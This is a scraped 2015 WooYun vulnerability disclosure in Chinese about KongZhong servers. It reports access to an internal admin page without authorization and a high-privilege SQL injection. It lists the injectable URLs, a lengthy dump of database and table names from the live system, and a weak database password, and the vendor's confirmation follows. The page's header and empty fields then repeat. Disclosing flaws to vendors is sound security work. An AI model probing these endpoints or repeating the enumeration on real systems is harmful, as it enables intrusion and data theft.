空中网服务器配置值班管理夸权限访问\高权限SQL注入(影响多个库)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155842

漏洞标题：空中网服务器配置值班管理夸权限访问\高权限SQL注入(影响多个库)

漏洞作者：路人甲

提交时间：2015-11-25 16:34

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-25：厂商已经确认，细节仅向厂商公开
2015-12-05：细节向核心白帽子及相关领域专家公开
2015-12-15：细节向普通白帽子公开
2015-12-25：细节向实习白帽子公开
2016-01-11：细节向公众公开
简要描述：

空中网|服务器配置值班管理夸权限访问|高权限注入|影响多个库
详细说明：

夸权限访问后台页面
http://xxx.kongzhong.com/index3.php
注入点
http://xxx.kongzhong.com/server.php?action=full&Uid=605
http://sd.kongzhong.com//applicationlist.php?action=full&Uid=10
漏洞证明：

$IL8GCI_XFA9Y1{G2CECAEN6.png$
Database: furq
[1 table]
+---------------------------------------+
| FILEDATA                              |
+---------------------------------------+
Database: quanxian
[14 tables]
+---------------------------------------+
| SEQUENCE                              |
| t_authority                           |
| t_enum_type                           |
| t_enum_value                          |
| t_menu                                |
| t_role                                |
| t_user                                |
| t_user_authority                      |
| t_user_channel                        |
| t_user_daily                          |
| t_user_menu                           |
| t_user_operators                      |
| t_user_product                        |
| t_user_role                           |
+---------------------------------------+
Database: aloco
[1 table]
+---------------------------------------+
| pushmsg                               |
+---------------------------------------+
Database: kzs
[2 tables]
+---------------------------------------+
| kzs_info                              |
| kzs_reply                             |
+---------------------------------------+
Database: kongzhong
[53 tables]
+---------------------------------------+
| session                               |
| user                                  |
| adminlog                              |
| adminutil                             |
| announcement                          |
| attachment                            |
| avatar                                |
| bbcode                                |
| calendar_events                       |
| customavatar                          |
| favorites_folders                     |
| favorites_threads                     |
| fb_ad                                 |
| fb_sitelink                           |
| forum                                 |
| forumpermission                       |
| gallery_photos                        |
| gallery_sort                          |
| icon                                  |
| league                                |
| moderator                             |
| newsfade                              |
| poll                                  |
| pollvote                              |
| post                                  |
| privatemessage                        |
| profilefield                          |
| regimage                              |
| replacement                           |
| replacementset                        |
| search                                |
| searchindex                           |
| setting                               |
| settinggroup                          |
| smilie                                |
| style                                 |
| subscribeforum                        |
| subscribethread                       |
| template                              |
| templateset                           |
| thread                                |
| threadrate                            |
| useractivation                        |
| userfield                             |
| usergroup                             |
| usertitle                             |
| vbstats_counter                       |
| vbstats_countries                     |
| vbstats_date                          |
| vbstats_exclude                       |
| vbstats_options                       |
| vbstats_referrer                      |
| word                                  |
+---------------------------------------+
Database: bbscs6
[76 tables]
+---------------------------------------+
| BBSCS_ADV                             |
| BBSCS_BLACKUSER                       |
| BBSCS_BOARD                           |
| BBSCS_BOARDS                          |
| BBSCS_BOOKMARK_0                      |
| BBSCS_BOOKMARK_1                      |
| BBSCS_BOOKMARK_2                      |
| BBSCS_BOOKMARK_3                      |
| BBSCS_BOOKMARK_4                      |
| BBSCS_BOOKMARK_5                      |
| BBSCS_BOOKMARK_6                      |
| BBSCS_BOOKMARK_7                      |
| BBSCS_BOOKMARK_8                      |
| BBSCS_BOOKMARK_9                      |
| BBSCS_BULLETIN                        |
| BBSCS_COMMEND                         |
| BBSCS_ELITE                           |
| BBSCS_FORUM_0                         |
| BBSCS_FORUM_1                         |
| BBSCS_FORUM_10                        |
| BBSCS_FORUM_11                        |
| BBSCS_FORUM_12                        |
| BBSCS_FORUM_13                        |
| BBSCS_FORUM_14                        |
| BBSCS_FORUM_15                        |
| BBSCS_FORUM_16                        |
| BBSCS_FORUM_17                        |
| BBSCS_FORUM_18                        |
| BBSCS_FORUM_19                        |
| BBSCS_FORUM_2                         |
| BBSCS_FORUM_3                         |
| BBSCS_FORUM_4                         |
| BBSCS_FORUM_5                         |
| BBSCS_FORUM_6                         |
| BBSCS_FORUM_7                         |
| BBSCS_FORUM_8                         |
| BBSCS_FORUM_9                         |
| BBSCS_FRIEND_0                        |
| BBSCS_FRIEND_1                        |
| BBSCS_FRIEND_2                        |
| BBSCS_FRIEND_3                        |
| BBSCS_FRIEND_4                        |
| BBSCS_FRIEND_5                        |
| BBSCS_FRIEND_6                        |
| BBSCS_FRIEND_7                        |
| BBSCS_FRIEND_8                        |
| BBSCS_FRIEND_9                        |
| BBSCS_GUESTBOOK_0                     |
| BBSCS_GUESTBOOK_1                     |
| BBSCS_GUESTBOOK_2                     |
| BBSCS_GUESTBOOK_3                     |
| BBSCS_GUESTBOOK_4                     |
| BBSCS_GUESTBOOK_5                     |
| BBSCS_GUESTBOOK_6                     |
| BBSCS_GUESTBOOK_7                     |
| BBSCS_GUESTBOOK_8                     |
| BBSCS_GUESTBOOK_9                     |
| BBSCS_ONLINESTAT                      |
| BBSCS_SUBSCIBE_0                      |
| BBSCS_SUBSCIBE_1                      |
| BBSCS_SUBSCIBE_2                      |
| BBSCS_SUBSCIBE_3                      |
| BBSCS_SUBSCIBE_4                      |
| BBSCS_SUBSCIBE_5                      |
| BBSCS_SUBSCIBE_6                      |
| BBSCS_SUBSCIBE_7                      |
| BBSCS_SUBSCIBE_8                      |
| BBSCS_SUBSCIBE_9                      |
| BBSCS_SYSSTAT                         |
| BBSCS_TABLEID                         |
| BBSCS_USERDETAIL                      |
| BBSCS_USERINFO                        |
| BBSCS_USERONLINE                      |
| BBSCS_VOTE                            |
| BBSCS_VOTEITEM                        |
| BBSCS_VOTEUSER                        |
+---------------------------------------+
Database: kzwedit
[4 tables]
+---------------------------------------+
| admin                                 |
| config                                |
| guestbook                             |
| lockip                                |
+---------------------------------------+
Database: cms_server
[20 tables]
+---------------------------------------+
| cms_application                       |
| cms_collect                           |
| cms_due_pro                           |
| cms_due_pro_time                      |
| cms_group                             |
| cms_info_due                          |
| cms_job_due                           |
| cms_server                            |
| cms_stat_due                          |
| cms_stock                             |
| cms_user                              |
| monitor_data                          |
| monitor_group                         |
| monitor_logs                          |
| monitor_maintenancerecord             |
| monitor_rate                          |
| monitor_role                          |
| monitor_server_info                   |
| monitor_user                          |
| wap_ip_tab                            |
+---------------------------------------+
Database: bjql
[7 tables]
+---------------------------------------+
| asiad                                 |
| bjql_info                             |
| bjql_member                           |
| bjql_picnews                          |
| bjql_picture                          |
| olympic_volunteer                     |
| volunteer                             |
+---------------------------------------+
Database: vote
[6 tables]
+---------------------------------------+
| poll_config                           |
| poll_data                             |
| poll_index                            |
| poll_ip                               |
| poll_log                              |
| poll_user                             |
+---------------------------------------+
Database: home
[2 tables]
+---------------------------------------+
| demouser                              |
| feedback                              |
+---------------------------------------+
Database: xvote
[7 tables]
+---------------------------------------+
| Vote_Admin                            |
| Vote_Area                             |
| Vote_Group                            |
| Vote_Vote                             |
| Vote_VoteItem                         |
| Vote_Voter                            |
| liuyan_temp                           |
+---------------------------------------+
Database: woaika
[2 tables]
+---------------------------------------+
| cardinfo                              |
| users                                 |
+---------------------------------------+
Database: GOLDENFROG
[13 tables]
+---------------------------------------+
| T_PS_CLIENT                           |
| T_PS_CONDITION                        |
| T_PS_PROMOCONDITION                   |
| T_PS_PROMOPATH                        |
| T_PS_SCHEMA                           |
| T_PS_SERVPATH                         |
| account                               |
| department                            |
| employee                              |
| employee20100331                      |
| employee_bak                          |
| mdwtest                               |
| ps_id                                 |
+---------------------------------------+
Database: php_bbs
[25 tables]
+---------------------------------------+
| pw_actions                            |
| pw_adminset                           |
| pw_announce                           |
| pw_attachs                            |
| pw_banuser                            |
| pw_bbsinfo                            |
| pw_config                             |
| pw_credits                            |
| pw_favors                             |
| pw_forums                             |
| pw_hack                               |
| pw_membercredit                       |
| pw_memberinfo                         |
| pw_members                            |
| pw_msg                                |
| pw_polls                              |
| pw_posts                              |
| pw_schcache                           |
| pw_sharelinks                         |
| pw_smiles                             |
| pw_styles                             |
| pw_threads                            |
| pw_tmsgs                              |
| pw_usergroups                         |
| pw_wordfb                             |
+---------------------------------------+
Database: jive
[17 tables]
+---------------------------------------+
| jiveForum                             |
| jiveForumProp                         |
| jiveGroup                             |
| jiveGroupPerm                         |
| jiveGroupProp                         |
| jiveGroupUser                         |
| jiveID                                |
| jiveMessage                           |
| jiveMessageProp                       |
| jiveModeration                        |
| jiveReward                            |
| jiveThread                            |
| jiveThreadProp                        |
| jiveUser                              |
| jiveUserPerm                          |
| jiveUserProp                          |
| jiveWatch                             |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: ymarticlefree
[7 tables]
+---------------------------------------+
| user                                  |
| art_topic                             |
| article                               |
| moderator                             |
| setting                               |
| smilie                                |
| usergroup                             |
+---------------------------------------+
Database: mrbs
[3 tables]
+---------------------------------------+
| mrbs_entry                            |
| mrbs_repeat                           |
| mrbs_room                             |
+---------------------------------------+
Database: core
[99 tables]
+---------------------------------------+
| language                              |
| session                               |
| user                                  |
| access                                |
| adminhelp                             |
| administrator                         |
| adminlog                              |
| adminutil                             |
| announcement                          |
| attachment                            |
| attachmenttype                        |
| attachmentviews                       |
| avatar                                |
| bank_log                              |
| bbcode                                |
| calendar                              |
| calendarcustomfield                   |
| calendarmoderator                     |
| calendarpermission                    |
| cpsession                             |
| cron                                  |
| cronlog                               |
| customavatar                          |
| customprofilepic                      |
| datastore                             |
| deletionlog                           |
| editlog                               |
| event                                 |
| faq                                   |
| forum                                 |
| forumpermission                       |
| forumread                             |
| holiday                               |
| icon                                  |
| imagecategory                         |
| imagecategorypermission               |
| mailqueue                             |
| moderation                            |
| moderator                             |
| moderatorlog                          |
| passwordhistory                       |
| paymentapi                            |
| paymentinfo                           |
| paymenttransaction                    |
| phrase                                |
| phrasetype                            |
| plugin                                |
| pm                                    |
| pmreceipt                             |
| pmtext                                |
| poll                                  |
| pollvote                              |
| post                                  |
| post_parsed                           |
| posthash                              |
| postindex                             |
| product                               |
| productcode                           |
| profilefield                          |
| ranks                                 |
| rating                                |
| regimage                              |
| reminder                              |
| reputation                            |
| reputationlevel                       |
| search                                |
| setting                               |
| settinggroup                          |
| sitelink                              |
| smilie                                |
| stats                                 |
| strikes                               |
| style                                 |
| subscribeevent                        |
| subscribeforum                        |
| subscribethread                       |
| subscription                          |
| subscriptionlog                       |
| tachyforumpost                        |
| tachythreadpost                       |
| template                              |
| templatehistory                       |
| thread                                |
| threadcat                             |
| threadrate                            |
| threadread                            |
| threadviews                           |
| upgradelog                            |
| useractivation                        |
| userban                               |
| userfield                             |
| usergroup                             |
| usergroupleader                       |
| usergrouprequest                      |
| usernote                              |
| userpromotion                         |
| usertextfield                         |
| usertitle                             |
| word                                  |
+---------------------------------------+
Database: diaocha
[1 table]
+---------------------------------------+
| diaocha                               |
+---------------------------------------+
Database: jforum
[35 tables]
+---------------------------------------+
| jforum_attach                         |
| jforum_attach_desc                    |
| jforum_attach_quota                   |
| jforum_banlist                        |
| jforum_bookmarks                      |
| jforum_categories                     |
| jforum_config                         |
| jforum_extension_groups               |
| jforum_extensions                     |
| jforum_forums                         |
| jforum_groups                         |
| jforum_karma                          |
| jforum_posts                          |
| jforum_posts_text                     |
| jforum_privmsgs                       |
| jforum_privmsgs_text                  |
| jforum_quota_limit                    |
| jforum_ranks                          |
| jforum_role_values                    |
| jforum_roles                          |
| jforum_search_results                 |
| jforum_search_topics                  |
| jforum_search_wordmatch               |
| jforum_search_words                   |
| jforum_sessions                       |
| jforum_smilies                        |
| jforum_themes                         |
| jforum_topics                         |
| jforum_topics_watch                   |
| jforum_user_groups                    |
| jforum_users                          |
| jforum_vote_desc                      |
| jforum_vote_results                   |
| jforum_vote_voters                    |
| jforum_words                          |
+---------------------------------------+
Database: cardjive
[17 tables]
+---------------------------------------+
| jiveForum                             |
| jiveForumProp                         |
| jiveGroup                             |
| jiveGroupPerm                         |
| jiveGroupProp                         |
| jiveGroupUser                         |
| jiveID                                |
| jiveMessage                           |
| jiveMessageProp                       |
| jiveModeration                        |
| jiveReward                            |
| jiveThread                            |
| jiveThreadProp                        |
| jiveUser                              |
| jiveUserPerm                          |
| jiveUserProp                          |
| jiveWatch                             |
+---------------------------------------+
Database: bbs2
[46 tables]
+---------------------------------------+
| session                               |
| user                                  |
| adminlog                              |
| adminutil                             |
| announcement                          |
| attachment                            |
| avatar                                |
| bbcode                                |
| calendar_events                       |
| customavatar                          |
| forum                                 |
| forumpermission                       |
| icon                                  |
| league                                |
| moderator                             |
| newsfade                              |
| poll                                  |
| pollvote                              |
| post                                  |
| privatemessage                        |
| profilefield                          |
| replacement                           |
| replacementset                        |
| search                                |
| searchindex                           |
| setting                               |
| settinggroup                          |
| smilie                                |
| style                                 |
| subscribeforum                        |
| subscribethread                       |
| template                              |
| templateset                           |
| thread                                |
| threadrate                            |
| useractivation                        |
| userfield                             |
| usergroup                             |
| usertitle                             |
| vbstats_counter                       |
| vbstats_countries                     |
| vbstats_date                          |
| vbstats_exclude                       |
| vbstats_options                       |
| vbstats_referrer                      |
| word                                  |
+---------------------------------------+
Database: phpwind
[25 tables]
+---------------------------------------+
| pw_actions                            |
| pw_adminset                           |
| pw_announce                           |
| pw_attachs                            |
| pw_banuser                            |
| pw_bbsinfo                            |
| pw_config                             |
| pw_credits                            |
| pw_favors                             |
| pw_forums                             |
| pw_hack                               |
| pw_membercredit                       |
| pw_memberinfo                         |
| pw_members                            |
| pw_msg                                |
| pw_polls                              |
| pw_posts                              |
| pw_schcache                           |
| pw_sharelinks                         |
| pw_smiles                             |
| pw_styles                             |
| pw_threads                            |
| pw_tmsgs                              |
| pw_usergroups                         |
| pw_wordfb                             |
+---------------------------------------+
Database: spoa
[6 tables]
+---------------------------------------+
| spoakf_address_config                 |
| spoakf_info                           |
| spoakf_info_detail                    |
| spoakf_info_detail_tmp                |
| spoakf_info_tmp                       |
| spoakf_term                           |
+---------------------------------------+
Database: info
[1 table]
+---------------------------------------+
| infomation                            |
+---------------------------------------+
Database: training
[15 tables]
+---------------------------------------+
| account                               |
| employee2                             |
| t_clubchange                          |
| t_clubmember                          |
| t_curriculum_informtime               |
| t_train_attendence                    |
| t_train_club                          |
| t_train_curriculum                    |
| t_train_evaluation                    |
| t_train_feedback                      |
| t_train_poll                          |
| t_train_pollcount                     |
| t_train_pollitem                      |
| t_train_quota                         |
| t_train_signup                        |
+---------------------------------------+
Database: forum
[48 tables]
+---------------------------------------+
| session                               |
| user                                  |
| adminlog                              |
| adminutil                             |
| announcement                          |
| attachment                            |
| avatar                                |
| bbcode                                |
| calendar_events                       |
| customavatar                          |
| forum                                 |
| forumpermission                       |
| gallery_photos                        |
| gallery_sort                          |
| icon                                  |
| league                                |
| moderator                             |
| newsfade                              |
| poll                                  |
| pollvote                              |
| post                                  |
| privatemessage                        |
| profilefield                          |
| replacement                           |
| replacementset                        |
| search                                |
| searchindex                           |
| setting                               |
| settinggroup                          |
| smilie                                |
| style                                 |
| subscribeforum                        |
| subscribethread                       |
| template                              |
| templateset                           |
| thread                                |
| threadrate                            |
| useractivation                        |
| userfield                             |
| usergroup                             |
| usertitle                             |
| vbstats_counter                       |
| vbstats_countries                     |
| vbstats_date                          |
| vbstats_exclude                       |
| vbstats_options                       |
| vbstats_referrer                      |
| word                                  |
+---------------------------------------+
Database: mysql
[125 tables]
+---------------------------------------+
| user                                  |
| cdb_access                            |
| cdb_activities                        |
| cdb_activityapplies                   |
| cdb_adminactions                      |
| cdb_admingroups                       |
| cdb_adminnotes                        |
| cdb_adminsessions                     |
| cdb_advertisements                    |
| cdb_announcements                     |
| cdb_attachments                       |
| cdb_attachpaymentlog                  |
| cdb_attachtypes                       |
| cdb_banned                            |
| cdb_bbcodes                           |
| cdb_buddys                            |
| cdb_caches                            |
| cdb_campaigns                         |
| cdb_creditslog                        |
| cdb_crons                             |
| cdb_debateposts                       |
| cdb_debates                           |
| cdb_failedlogins                      |
| cdb_faqs                              |
| cdb_favorites                         |
| cdb_forumfields                       |
| cdb_forumlinks                        |
| cdb_forumrecommend                    |
| cdb_forums                            |
| cdb_imagetypes                        |
| cdb_invites                           |
| cdb_itempool                          |
| cdb_magiclog                          |
| cdb_magicmarket                       |
| cdb_magics                            |
| cdb_medals                            |
| cdb_memberfields                      |
| cdb_membermagics                      |
| cdb_members                           |
| cdb_memberspaces                      |
| cdb_moderators                        |
| cdb_modworks                          |
| cdb_myposts                           |
| cdb_mythreads                         |
| cdb_onlinelist                        |
| cdb_onlinetime                        |
| cdb_orders                            |
| cdb_paymentlog                        |
| cdb_pluginhooks                       |
| cdb_plugins                           |
| cdb_pluginvars                        |
| cdb_pms                               |
| cdb_pmsearchindex                     |
| cdb_polloptions                       |
| cdb_polls                             |
| cdb_posts                             |
| cdb_profilefields                     |
| cdb_projects                          |
| cdb_promotions                        |
| cdb_ranks                             |
| cdb_ratelog                           |
| cdb_regips                            |
| cdb_relatedthreads                    |
| cdb_rewardlog                         |
| cdb_rsscaches                         |
| cdb_searchindex                       |
| cdb_sessions                          |
| cdb_settings                          |
| cdb_smilies                           |
| cdb_spacecaches                       |
| cdb_stats                             |
| cdb_statvars                          |
| cdb_styles                            |
| cdb_stylevars                         |
| cdb_subscriptions                     |
| cdb_tags                              |
| cdb_templates                         |
| cdb_threads                           |
| cdb_threadsmod                        |
| cdb_threadtags                        |
| cdb_threadtypes                       |
| cdb_tradecomments                     |
| cdb_tradelog                          |
| cdb_tradeoptionvars                   |
| cdb_trades                            |
| cdb_typemodels                        |
| cdb_typeoptions                       |
| cdb_typeoptionvars                    |
| cdb_typevars                          |
| cdb_usergroups                        |
| cdb_validating                        |
| cdb_videos                            |
| cdb_videotags                         |
| cdb_words                             |
| columns_priv                          |
| db                                    |
| event                                 |
| func                                  |
| general_log                           |
| ghost                                 |
| ghost1                                |
| ghostsys                              |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| host                                  |
| ndb_binlog_index                      |
| plugin                                |
| proc                                  |
| procs_priv                            |
| servers                               |
| sgl                                   |
| slow_log                              |
| tables_priv                           |
| tempEx                                |
| tempExT                               |
| tempExT1                              |
| tempMix                               |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
| udp                                   |
+---------------------------------------+
Database: bjqlbbs
[25 tables]
+---------------------------------------+
| pw_actions                            |
| pw_adminset                           |
| pw_announce                           |
| pw_attachs                            |
| pw_banuser                            |
| pw_bbsinfo                            |
| pw_config                             |
| pw_credits                            |
| pw_favors                             |
| pw_forums                             |
| pw_hack                               |
| pw_membercredit                       |
| pw_memberinfo                         |
| pw_members                            |
| pw_msg                                |
| pw_polls                              |
| pw_posts                              |
| pw_schcache                           |
| pw_sharelinks                         |
| pw_smiles                             |
| pw_styles                             |
| pw_threads                            |
| pw_tmsgs                              |
| pw_usergroups                         |
| pw_wordfb                             |
+---------------------------------------+
Database: pxxt
[22 tables]
+---------------------------------------+
| EMPLOYEE15                            |
| EMPLOYEE17                            |
| EMPLOYEE2                             |
| EMPLOYEE6                             |
| EMPLOYEE7                             |
| employee10                            |
| employee11                            |
| employee12                            |
| employee13                            |
| employee14                            |
| employee16                            |
| employee3                             |
| employee4                             |
| employee5                             |
| employee8                             |
| employee9                             |
| t_train_attendence                    |
| t_train_curriculum                    |
| t_train_poll                          |
| t_train_pollcount                     |
| t_train_pollitem                      |
| t_train_signup                        |
+---------------------------------------+
Database: jspcndb
[8 tables]
+---------------------------------------+
| wh_board                              |
| wh_keyword                            |
| wh_logrecord                          |
| wh_news                               |
| wh_newsdetail                         |
| wh_review                             |
| wh_type                               |
| wh_user                               |
+---------------------------------------+
Database: booksdb
[2 tables]
+---------------------------------------+
| book_info                             |
| book_jy_info                          |
+---------------------------------------+
Database: ql
[10 tables]
+---------------------------------------+
| ql_10member                           |
| ql_federation_picture                 |
| ql_id                                 |
| ql_info                               |
| ql_meeting                            |
| ql_member                             |
| ql_message                            |
| ql_message_test                       |
| ql_picture                            |
| ql_replymo                            |
+---------------------------------------+
修复方案：

类似这样的员工使用后台可以限制公网访问http://xxx.kongzhong.com！
数据库密码123456可见很犀利！
wooyun很多php大神，贵公司只要发出英雄帖，注入问题分分钟搞定！
最后问一句，我在贵公司坦克世界打炮，手贱杀了队友能不能帮我解封啊！
版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中
漏洞Rank：5
确认时间：2015-11-25 17:11
厂商回复：

谢谢关注，可以把你的坦克账号告诉我们，我们帮你协调。
漏洞评价：

评价

2015-11-26 10:46 | railguninhere ( 路人 | Rank:4 漏洞数:2 | 电磁炮大失败！)

卧槽，这个6啊！我想要屎59！
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155842

漏洞标题：空中网服务器配置值班管理夸权限访问\高权限SQL注入(影响多个库)

相关厂商：空中网

漏洞作者：路人甲

提交时间：2015-11-25 16:34

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155842

漏洞标题：空中网服务器配置值班管理夸权限访问\高权限SQL注入(影响多个库)

相关厂商：空中网

漏洞作者： 路人甲

提交时间：2015-11-25 16:34

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155842"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云
